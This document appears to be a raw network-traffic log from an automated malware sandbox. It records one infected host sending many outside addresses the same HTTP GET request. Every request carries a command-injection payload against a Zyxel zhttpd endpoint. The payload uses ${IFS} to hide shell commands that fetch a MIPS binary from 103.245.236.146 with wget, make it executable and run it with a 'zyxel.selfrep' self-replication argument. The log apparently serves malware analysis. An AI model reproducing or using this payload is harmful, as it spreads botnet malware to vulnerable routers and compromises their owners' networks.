                                                        Jan 28, 2024 10:12:46.285501003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2757192.168.2.1450632122.244.194.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285537004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2758192.168.2.145536061.174.242.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285569906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2759192.168.2.1459540120.222.48.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285614014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2760192.168.2.1436162151.0.163.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285653114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2761192.168.2.14497985.237.134.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285706043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2762192.168.2.144812046.2.229.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285738945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2763192.168.2.1445800110.216.189.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285777092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2764192.168.2.1458572190.104.122.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285803080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2765192.168.2.1453378171.28.39.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285837889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2766192.168.2.14530569.171.49.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285878897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2767192.168.2.146017024.173.169.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285917997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2768192.168.2.14472922.18.70.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285950899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2769192.168.2.1439236140.155.173.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286003113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2770192.168.2.144243643.194.13.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286027908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2771192.168.2.1457166167.111.248.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286060095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2772192.168.2.1451894223.135.83.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286112070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2773192.168.2.1450412137.183.82.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286145926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2774192.168.2.1436048129.92.41.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286164045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2775192.168.2.146002270.81.0.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286230087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2776192.168.2.144024293.189.216.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286278963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2777192.168.2.1457450152.24.24.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286307096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2778192.168.2.1460928196.205.66.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286354065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2779192.168.2.143648062.202.183.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286406994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2780192.168.2.1444364209.167.172.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286448002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2781192.168.2.143396882.121.2.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286484957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2782192.168.2.144198099.153.214.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286519051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2783192.168.2.143278691.121.159.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286567926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2784192.168.2.1458738158.227.97.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286609888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2785192.168.2.1457772138.195.242.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286639929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2786192.168.2.1447428195.51.20.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286685944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2787192.168.2.14594242.169.126.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286708117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2788192.168.2.144470063.185.73.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286736012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2789192.168.2.143922697.73.117.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286791086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2790192.168.2.143404275.95.137.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286844969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2791192.168.2.145039451.195.116.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286868095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2792192.168.2.143737677.58.216.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286896944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2793192.168.2.1449786168.206.142.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.286961079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2794192.168.2.1438538188.217.238.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287009954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2795192.168.2.145815296.236.243.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287115097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2796192.168.2.146066692.182.217.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287147045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2797192.168.2.1456716202.1.172.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287187099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2798192.168.2.1437094183.39.220.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287229061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2799192.168.2.1440600135.244.55.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287261009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2800192.168.2.1445746190.182.147.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287312031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2801192.168.2.1439230123.62.120.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287363052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2802192.168.2.1438724217.58.176.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287400007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2803192.168.2.1460926180.32.162.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287440062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2804192.168.2.145313654.246.181.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287497044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2805192.168.2.1435992190.35.207.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287554026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2806192.168.2.1438986155.134.3.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287583113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2807192.168.2.1442192201.175.123.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287619114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2808192.168.2.1447904213.205.57.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287672997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2809192.168.2.144231483.185.49.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287734985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2810192.168.2.1452498112.30.175.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287743092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2811192.168.2.144623841.221.206.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287787914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2812192.168.2.143299089.96.116.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287818909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2813192.168.2.1450040160.121.189.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287866116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2814192.168.2.1454336177.22.199.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287925959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2815192.168.2.1439804190.32.221.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.287956953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2816192.168.2.1460550161.219.26.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288007021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2817192.168.2.1451236201.74.52.28443
                                                        TimestampBytes transferredDirectionData
